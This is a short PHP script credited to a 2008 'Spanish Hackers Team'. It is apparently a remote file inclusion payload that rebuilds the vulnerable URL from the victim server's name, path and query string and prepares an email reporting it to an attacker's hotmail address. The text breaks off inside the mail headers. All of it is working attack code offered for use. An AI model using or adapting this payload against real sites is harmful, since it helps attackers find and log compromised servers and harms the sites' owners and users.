// alert_of_RFI_v.1 - priv8
//
// 15-06-2008 (released!)
//
// code by JosS
// Spanish Hackers Team - [SHT]
// www.spanish-hackers.com/
$fecha = date( "d/m/Y");
$hora = date ("H:i:s", time(void) );
$fstring = $_SERVER['PHP_SELF'];
$string = $_SERVER['QUERY_STRING'];
$servidor = $_SERVER['SERVER_NAME'];
$remp = ereg_replace('http://spanish-hackers.com/idea.txt', 'http://spanish-hackers.com/idea.txt', $string);
$todo = 'http://' . $servidor . $fstring . '?' . $remp;
$hacker = "sys-project@hotmail.com;";
$asunto = "RFI released!";
$mensaje = "fecha: $fecha
";
$mensaje .= "hora: $hora
";
$mensaje .= "servidor: $servidor
";
$mensaje .= "rfi: $todo
";
$mensaje .= "Spanish Hackers Team - [SHT]
";
$header = "MIME-Version: 1.0\r\n";
$header .= "Content-type: text/html; charset=iso-9059-1\r\n";
$header .= "From: $servidor